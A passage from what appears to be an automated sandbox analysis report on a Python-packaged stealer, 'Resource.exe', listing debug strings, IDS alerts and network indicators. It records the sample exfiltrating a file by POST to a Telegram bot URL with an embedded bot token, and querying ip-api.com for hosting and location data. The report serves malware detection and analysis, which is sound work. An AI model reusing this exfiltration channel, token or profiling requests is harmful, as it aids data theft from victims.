              Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: Resource.exe, Resource.exe, 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: Resource.exe, Resource.exe, 00000001.00000002.2485937186.00007FF8B8AF1000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: 8C:\Users\user\AppData\Local\Temp\erdw4v5g\erdw4v5g.pdb source: powershell.exe, 00000044.00000002.2259141089.000001B7D5905000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdb source: Resource.exe, Resource.exe, 00000001.00000002.2484486391.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmp, rar.exe, 00000067.00000000.2365890239.00007FF618630000.00000002.00000001.01000000.0000001E.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\python311.pdb source: Resource.exe, 00000001.00000002.2483357030.00007FF8A8CCB000.00000040.00000001.01000000.00000004.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: Resource.exe, Resource.exe, 00000001.00000002.2485371418.00007FF8B7E11000.00000040.00000001.01000000.0000000E.sdmp
              Source: C:\Users\user\Desktop\Resource.exeCode function: 0_2_00007FF6E60B7E4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF6E60B7E4C
              Source: C:\Users\user\Desktop\Resource.exeCode function: 0_2_00007FF6E60B7E4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF6E60B7E4C
              Source: C:\Users\user\Desktop\Resource.exeCode function: 0_2_00007FF6E60A88D0 FindFirstFileExW,FindClose,0_2_00007FF6E60A88D0
              Source: C:\Users\user\Desktop\Resource.exeCode function: 0_2_00007FF6E60C1EE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF6E60C1EE4
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6185E46EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,103_2_00007FF6185E46EC
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6185DE21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,103_2_00007FF6185DE21C
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6186288E0 FindFirstFileExA,103_2_00007FF6186288E0

              Networking

              barindex
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49853 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2857751 - Severity 1 - ETPRO MALWARE SynthIndi Loader Exfiltration Activity (POST) : 192.168.2.5:49853 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2857752 - Severity 1 - ETPRO MALWARE SynthIndi Loader CnC Response : 149.154.167.220:443 -> 192.168.2.5:49853
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 3
              Source: unknownDNS query: name: api.telegram.org
              Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
              Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
              Source: unknownDNS query: name: ip-api.com
              Source: unknownDNS query: name: ip-api.com
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8B7E557E4 recv,1_2_00007FF8B7E557E4
              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.1.0
              Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.1.0
              Source: Resource.exe, 00000001.00000002.2476060853.0000020AB4218000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: global trafficDNS traffic detected: DNS query: blank-63z6o.in
              Source: global trafficDNS traffic detected: DNS query: ip-api.com
              Source: global trafficDNS traffic detected: DNS query: api.telegram.org
              Source: unknownHTTP traffic detected: POST /bot6723507541:AAFus4a_vfOH23XVGo8SFLxAeDedGw1G3vk/sendDocument HTTP/1.1Host: api.telegram.orgAccept-Encoding: identityContent-Length: 757011User-Agent: python-urllib3/2.1.0Content-Type: multipart/form-data; boundary=4f135cb48c13ab6db74f60ce4e8d2c0e
              Source: Resource.exe, 00000000.00000003.2017977905.00000203A2F44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digi
              Source: Resource.exe, 00000000.00000003.2017614505.00000203A2F44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.co
              Source: Resource.exe, 00000000.00000003.2016619033.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2017977905.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016385260.00000203A2F50000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016535056.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019287428.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019633283.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2015982249.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016385260.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019397259.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016211296.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016081107.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2015892207.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2018048901.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016286257.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2017614505.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016456861.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019287428.00000203A2F51000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2018246304.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, python311.dll.0.dr, select.pyd.0.dr, _decimal.pyd.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: Resource.exe, 00000000.00000003.2016619033.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2017977905.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016535056.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019287428.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019633283.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2015982249.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016385260.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019397259.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016211296.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016081107.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2015892207.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2018048901.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016286257.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2017614505.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016456861.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2018246304.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, python311.dll.0.dr, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
              Source: Resource.exe, 00000000.00000003.2016619033.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2017977905.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016535056.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019287428.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019633283.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2015982249.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016385260.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019397259.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016211296.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016081107.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2015892207.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2018048901.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016286257.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2017614505.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016456861.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2018246304.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, python311.dll.0.dr, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: Resource.exe, 00000000.00000003.2016619033.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2017977905.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016385260.00000203A2F50000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016535056.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019287428.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019633283.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2015982249.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016385260.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019397259.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016211296.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016081107.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2015892207.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2018048901.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016286257.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2017614505.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016456861.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019287428.00000203A2F51000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2018246304.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, python311.dll.0.dr, select.pyd.0.dr, _decimal.pyd.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: Resource.exe, 00000000.00000003.2018935151.00000203A2F44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: Resource.exe, 00000001.00000003.2469239519.0000020AB3D2F000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2473117545.0000020AB3C3E000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2182066365.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2182427502.0000020AB3C3E000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2176084487.0000020AB3DB3000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2153816176.0000020AB3C3E000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2143553843.0000020AB3CE2000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2176084487.0000020AB3D2A000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2472629307.0000020AB39A4000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2473991715.0000020AB3D31000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2162875077.0000020AB3C3E000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2198157815.0000020AB3D31000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2198157815.0000020AB3DB3000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2198157815.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2263201578.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2473894585.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2469860904.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2245183110.0000020AB3CDC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2194288355.000001CEC3770000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.2349979588.000001B7ED69A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: Resource.exe, 00000000.00000003.2018935151.00000203A2F44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
              Source: Resource.exe, 00000000.00000003.2018935151.00000203A2F44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
              Source: Resource.exe, 00000000.00000003.2016619033.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2017977905.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016385260.00000203A2F50000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016535056.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019287428.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019633283.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2015982249.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016385260.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019397259.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016211296.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016081107.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2015892207.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2018048901.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016286257.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2017614505.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016456861.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019287428.00000203A2F51000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2018246304.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, python311.dll.0.dr, select.pyd.0.dr, _decimal.pyd.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: Resource.exe, 00000000.00000003.2016619033.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2017977905.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016535056.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019287428.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019633283.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2015982249.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016385260.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019397259.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016211296.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016081107.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2015892207.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2018048901.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016286257.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2017614505.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016456861.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2018246304.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, python311.dll.0.dr, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
              Source: Resource.exe, 00000000.00000003.2016619033.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2017977905.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016535056.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019287428.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019633283.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2015982249.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016385260.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019397259.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016211296.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016081107.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2015892207.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2018048901.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016286257.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2017614505.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016456861.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2018246304.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, python311.dll.0.dr, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: _hashlib.pyd.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: Resource.exe, 00000000.00000003.2016619033.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2017977905.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016535056.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019287428.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019633283.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2015982249.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016385260.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019397259.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016211296.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016081107.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2015892207.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2018048901.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016286257.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2017614505.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016456861.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2018246304.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, python311.dll.0.dr, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
              Source: Resource.exe, 00000000.00000003.2018935151.00000203A2F44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
              Source: Resource.exe, 00000001.00000003.2029000040.0000020AB381C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);
              Source: Resource.exe, 00000001.00000003.2182066365.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2470045759.0000020AB3D05000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2263382066.0000020AB3D05000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2473942737.0000020AB3D08000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2143553843.0000020AB3CE2000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2198157815.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2263201578.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2469860904.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2245183110.0000020AB3CDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/
              Source: Resource.exe, 00000001.00000002.2472629307.0000020AB37DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail/
              Source: Resource.exe, 00000001.00000002.2472629307.0000020AB37DE000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2472335398.0000020AB3636000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
              Source: Resource.exe, 00000001.00000002.2473004554.0000020AB39C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545
              Source: Resource.exe, 00000001.00000003.2030787005.0000020AB3901000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2030704997.0000020AB38CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545r
              Source: Resource.exe, 00000001.00000002.2472518311.0000020AB36C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
              Source: Resource.exe, 00000001.00000003.2030704997.0000020AB38CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hostingr~
              Source: Resource.exe, 00000001.00000003.2030704997.0000020AB38CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hostingr~r
              Source: powershell.exe, 0000000E.00000002.2266669419.000001CED38F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.2259141089.000001B7D6EED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.2342371224.000001B7E573D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.2342371224.000001B7E55FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: Resource.exe, 00000000.00000003.2487969970.00000203A2F3E000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000002.2488588175.00000203A2F3E000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2018935151.00000203A2F44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
              Source: Resource.exe, 00000000.00000003.2016619033.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2017977905.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016535056.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019287428.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019633283.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2015982249.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016385260.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019397259.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016211296.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016081107.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2015892207.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2018048901.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016286257.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2017614505.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016456861.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2018246304.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, python311.dll.0.dr, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.drString found in binary or memory: http://ocsp.digicert.com0
              Source: Resource.exe, 00000000.00000003.2016619033.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2017977905.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016385260.00000203A2F50000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016535056.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019287428.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019633283.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2015982249.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016385260.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019397259.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 